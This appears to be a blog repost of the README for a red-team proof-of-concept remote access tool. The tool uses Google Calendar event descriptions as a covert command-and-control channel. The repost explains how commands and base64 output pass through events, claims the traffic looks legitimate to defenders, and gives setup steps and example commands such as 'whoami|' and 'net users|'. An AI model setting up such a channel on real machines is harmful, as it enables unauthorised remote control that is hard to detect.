Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure.
To use GRC, only a Gmail account is required. The script creates a ‘Covert Channel’ by exploiting the event descriptions in Google Calendar. The target will connect directly to Google.”
It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be 🙂 very thanks to my mates “Tortellini”Â
POC
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNHc3oJMNs_PnSv9xyynXatTX7LXXvBwUKS4hG9Lcyf4OPXB4R2KoK04weaUE2B6Gy_9OB1vq3kKDmU5ME7ktdXsLadQiiGgXeoAMNavFvLDMr1_JiqOFirk2tHjGqpL4fp4EmOViSOGd5mnsRFoO1QWKb-IK7T_9SHdWSgSFOPEmHuhUK9kNhCsTwY2-f/s16000/246669403-b83e6f28-36bd-454d-9c04-87095a280b1a.gif)
How It Works
GCR attempt to connect to a valid shared Google Calendar link and after generating a unique ID check for any yet-to-be-executed commands.
If it is not able to find any command, it creates a new one (fixed to “whoami”) as a proof of connection. Every event is composed by two part:
- The Title, which contains the unique ID, it means you can schedule multiple commands creating events having the same unique ID as name
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHb_BEDOEm2F0LNWz44B3MwxzupGnNj9y75MR-CQamobXI4YmoWhMQpOWs_P2hpB8G36OjHtpMLSfB3JsDZUkiJ42yKd6F654zNHBlFHmCccGxaSOtyo8l9AGI1gqEw2WrQ-PGz9PDEvsw81FlcKq_LlMeiRGlT44gax0AanUzkfWmSdJm2ISXzJ2zIc7/s16000/246695874-df999259-3b1b-419f-b555-204fc5dc2dbf.webp)
3. The Description, which contains the command to execute and the base64 encoded output using the pipe symbol as separator “|”
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDW6lfzGJYB-YqY-3M3jZibGFA4Vvc4Apr6ct96_H2sH9Js8BjUNd3o2yRW5NzV_4CIXewp9SiflbszdHCqcCwGyU8BknA-BjYTQSwaYkqieB6rValD_3qHgw_rWGKCHtathHg0mUtsdPHrpPLPJVyhqVdJg9OcdnIy0-ovwPC6Xhsk8W_cgyboyvOQ6r/s16000/246695890-5f2630e2-5591-48d1-bae2-5695afa8a33e.webp)
Workflow Attack
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFNK3e4qo3yjYYfvReTL4f5OH-KNOwlzXWRBm9SG-vsfM2MPGHZslwOYGIx-5RMpES1R0StlnQ7N8NffFthYepcuLjJei9CzBizQOBKDooFWYXnyQy3ZCARnih8sl8j3mpj64kLtlAPdvrYJkf6NmQMu-aPgm_MBznxnqXF4iIVX-p3Y3qOMxUFuatSMZe/s16000/246698578-99bec717-4e9a-4880-9a5a-b038666441b6.webp)
What A SOC Analyst/Blue Teamer Will See?
Focusing specifically on the network aspect, the only connections established will be to Google’s servers, making the connection appear completely legitimate. Let’s check with process hacker:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWz7D2tQBvr_4A8Qk-2zm26Gl3MtPr-PK9QJ_dRbK3F6YtSLu6f3MTar06X8ZhxPnjwMmHq8D1BMicsrFqNJfAREz2fpIihMlMxloOSIJ9AoJjT91fVPoaxTPL1UBoGUVSGmMOrrj890S90j2ljB5wrndMW-9g7RErBxwQK16KJwdMn0sPkYnbBZu7unrX/s16000/246691703-66dbd7b5-4060-4829-9229-99bb0c5a19e5.png)
which results in this
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3c9Xqq5p5XNCD8rp-x05mkvvgGWhpXVY7eXU6zEn7dD01u3iH3R6ZQ79vm3p3YbNX2jUMCYDkctkDJeuqlqcFQfq9qxlSqtc43Ij4YuKd5jBZXnIuR9oLQQuC0hZSuczlN5VlNTaaYivrwgbvBwkwSbRljKNg4RXh5h8uXeIkY9XIic6OuuUcjGUKx4PE/s16000/246691676-244e9acf-44a9-45b7-92f5-f61d911446a3.webp)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcHltfYQZJr9IGbXTrtC13mawM0DGVCjB7ZeNzkD0l9X9i11itv__hRXOz7oMTnZminY7J_ocs41uhWm9Otii-S474MADefaw8N5akYpAZV43OUu8Ff3_1tlFg3dwtKndMAB6HrYhRQ6x5bBY5gZlntCl2uu_XNzUxviVGDn6VtTM3QUY9xDW9XDFAJuO/s16000/246691715-14c875fc-c28f-45d6-94c1-64e3dd02606b.webp)
How To Use It
- Setup a Google service account and obtain the credentials.json file, place the file in the same directory of the script
- Create a new Google calendar and share it with the new created service account
- Edit the script to point your calendar address
- Once executed on the target machine an event with a unique target ID is automatically created autoexecuting the “whoami” command
- Use the following syntax in the event description for the communication => CLEAR_COMMAND|BASE64_OUTPUTExamples:
- “whoami|”
- “net users|”
- The date is fixed on May 30th, 2023. You can create unlimited events using the unique ID as the event name.